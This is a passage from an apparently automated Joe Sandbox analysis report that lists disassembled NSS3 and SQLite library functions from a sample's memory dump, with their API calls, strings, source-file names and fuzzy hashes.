                                                                                                                                                                                                                            • Part of subcall function 6C46AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C46AF0E
                                                                                                                                                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F16
                                                                                                                                                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F1C
                                                                                                                                                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F25
                                                                                                                                                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C580F2B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                                                                          • API String ID: 2948422844-1374795319
                                                                                                                                                                                                                          • Opcode ID: 234b9fdb32172bf0b7010a056cd347d8a294a0079b3cec7361a0cccaa4dd6fb0
                                                                                                                                                                                                                          • Instruction ID: 6153c19723dd482b28a669b5c0c3acdf54a3cfcc9ea85e28885e5c487b7594fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 234b9fdb32172bf0b7010a056cd347d8a294a0079b3cec7361a0cccaa4dd6fb0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0701C0B6901154ABDF01AF64DC85CAB3F3CEF86368B024069FD0997B01D731EA5086A2
                                                                                                                                                                                                                          Function 6C561C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Fl,?,?,6C464E1D), ref: 6C561C8A
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C561CB6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                                          • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Fl
                                                                                                                                                                                                                          • API String ID: 1840970956-1300945822
                                                                                                                                                                                                                          • Opcode ID: 2049cc8b4f8600980df4b2b975f56f29a7c3e0cf7973a311db0c0aa4f0237b3c
                                                                                                                                                                                                                          • Instruction ID: 084cef2e87514878ac3b4a3e0c2eb4077d46f2b90b5b52c0c6a12f89f1b917ab
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2049cc8b4f8600980df4b2b975f56f29a7c3e0cf7973a311db0c0aa4f0237b3c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB0124B1A001404BE700BE69D802D7A73E5EF8634CB15086DE8858BB12EB32E867C791
                                                                                                                                                                                                                          Function 6C544D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544DC3
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C544DE0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C544DBD
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C544DCB
                                                                                                                                                                                                                          • invalid, xrefs: 6C544DB8
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C544DDA
                                                                                                                                                                                                                          • misuse, xrefs: 6C544DD5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                          • Opcode ID: 040788ad503a677ac242e584c39d246b476a7af69c8f09b7fb688c6b838085e8
                                                                                                                                                                                                                          • Instruction ID: 741ef227abc521eb50b642854e55f0976db0fb923224e2c3587710e050772fc1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 040788ad503a677ac242e584c39d246b476a7af69c8f09b7fb688c6b838085e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2F02E31E549647BD7009556CC22FCE3B555F11319F4A49F0FD047BE52D31AA85083D1
                                                                                                                                                                                                                          Function 6C544DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C544E30
                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C544E4D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C544E2A
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C544E38
                                                                                                                                                                                                                          • invalid, xrefs: 6C544E25
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C544E47
                                                                                                                                                                                                                          • misuse, xrefs: 6C544E42
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                                                          • Opcode ID: fb347f56a001f36196ccce89d5332f8c434b1168840aa900f20bb000f6ec6591
                                                                                                                                                                                                                          • Instruction ID: bc9d2231a3cb27150ed016694d085566f3a71af8302732d619944c26fe5f7ec2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb347f56a001f36196ccce89d5332f8c434b1168840aa900f20bb000f6ec6591
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EF02731EC49282BE71054669C21F8A3B855B11329F0DC5A1EE087BE93D30A987142D3
                                                                                                                                                                                                                          Function 6C479FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C47A086
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C47A09B
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C47A0B7
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47A0E9
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C47A11B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C47A12F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C47A148
                                                                                                                                                                                                                            • Part of subcall function 6C491A40: PR_Now.NSS3(?,00000000,6C4728AD,00000000,?,6C48F09A,00000000,6C4728AD,6C4793B0,?,6C4793B0,6C4728AD,00000000,?,00000000), ref: 6C491A65
                                                                                                                                                                                                                            • Part of subcall function 6C491940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C494126,?), ref: 6C491966
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47A1A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3953697463-0
                                                                                                                                                                                                                          • Opcode ID: 918f0944c2384415ff1c5f40b1ab6472882621b14a19de4f6a9bf468ce43d056
                                                                                                                                                                                                                          • Instruction ID: 99d2f08a55aad4e1a3ce0c93ec4870eb4311f1db612ed44352b16e53c84c6448
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 918f0944c2384415ff1c5f40b1ab6472882621b14a19de4f6a9bf468ce43d056
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB5106B5A013409BEB20DF69CC48EEB77B8EF86309B15442DDC2997B01EB31E945C6B1
                                                                                                                                                                                                                          Function 6C4B0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?,?,00000000,?,?), ref: 6C4B0CB3
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?), ref: 6C4B0DC1
                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?), ref: 6C4B0DEC
                                                                                                                                                                                                                            • Part of subcall function 6C4D0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C472AF5,?,?,?,?,?,6C470A1B,00000000), ref: 6C4D0F1A
                                                                                                                                                                                                                            • Part of subcall function 6C4D0F10: malloc.MOZGLUE(00000001), ref: 6C4D0F30
                                                                                                                                                                                                                            • Part of subcall function 6C4D0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C4D0F42
                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0DFF
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000), ref: 6C4B0E16
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0E53
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?,?,6C4B1444,?,?,00000000), ref: 6C4B0E65
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C4B1444,?,00000001,?,00000000,00000000,?), ref: 6C4B0E79
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: TlsGetValue.KERNEL32(00000000,?,6C490844,?), ref: 6C4C157A
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: EnterCriticalSection.KERNEL32(?,?,?,6C490844,?), ref: 6C4C158F
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: PR_Unlock.NSS3(?,?,?,?,6C490844,?), ref: 6C4C15B2
                                                                                                                                                                                                                            • Part of subcall function 6C48B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C491397,00000000,?,6C48CF93,5B5F5EC0,00000000,?,6C491397,?), ref: 6C48B1CB
                                                                                                                                                                                                                            • Part of subcall function 6C48B1A0: free.MOZGLUE(5B5F5EC0,?,6C48CF93,5B5F5EC0,00000000,?,6C491397,?), ref: 6C48B1D2
                                                                                                                                                                                                                            • Part of subcall function 6C4889E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C4888AE,-00000008), ref: 6C488A04
                                                                                                                                                                                                                            • Part of subcall function 6C4889E0: EnterCriticalSection.KERNEL32(?), ref: 6C488A15
                                                                                                                                                                                                                            • Part of subcall function 6C4889E0: memset.VCRUNTIME140(6C4888AE,00000000,00000132), ref: 6C488A27
                                                                                                                                                                                                                            • Part of subcall function 6C4889E0: PR_Unlock.NSS3(?), ref: 6C488A35
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1601681851-0
                                                                                                                                                                                                                          • Opcode ID: 4d9a00a378e8ddd31add2964990aff2bcfd88765bf11fa8f7aa0722309b23554
                                                                                                                                                                                                                          • Instruction ID: 5ddcf4292c888d882b081e19fdd0da6f7d75ee0144b5b777cca20d11710a0f40
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d9a00a378e8ddd31add2964990aff2bcfd88765bf11fa8f7aa0722309b23554
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB51C6F5E012105FEB10DF64DD81EAB37A8AF45259F150068EC09ABB52FB31ED1586F2
                                                                                                                                                                                                                          Function 6C466E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C466ED8
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C466EE5
                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C466FA8
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?), ref: 6C466FDB
                                                                                                                                                                                                                          • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C466FF0
                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C467010
                                                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C46701D
                                                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C467052
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1920323672-0
                                                                                                                                                                                                                          • Opcode ID: d3872a12b5541e6eb9050e2768900c4ee2ee367e67592a910cf3806b4ac4d78c
                                                                                                                                                                                                                          • Instruction ID: 289875c5c39dfbca6e357bfb23965bd9553f6e8b20e59c6a2f7255d130917c5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3872a12b5541e6eb9050e2768900c4ee2ee367e67592a910cf3806b4ac4d78c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B61E5B1E192158FDB04CF66D800FEEB7B2AF85308F184169D855ABF59E7319C06CBA0
                                                                                                                                                                                                                          Function 6C4D8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C4D7313), ref: 6C4D8FBB
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D9012
                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D903C
                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D909E
                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D90DB
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D90F1
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C4D7313), ref: 6C4D906B
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C4D7313), ref: 6C4D9128
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3590961175-0
                                                                                                                                                                                                                          • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                          • Instruction ID: afab832b605e15187ad5d9e4e1d774c4a4a844141734022c53b201dfc6784d51
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF518F71A002028BFB10EF6ADC64F2AB3F9AF54359F164129D915D7B61EB32F805CB91
                                                                                                                                                                                                                          Function 6C489C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C488850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C490715), ref: 6C488859
                                                                                                                                                                                                                            • Part of subcall function 6C488850: PR_NewLock.NSS3 ref: 6C488874
                                                                                                                                                                                                                            • Part of subcall function 6C488850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C48888D
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C489CAD
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
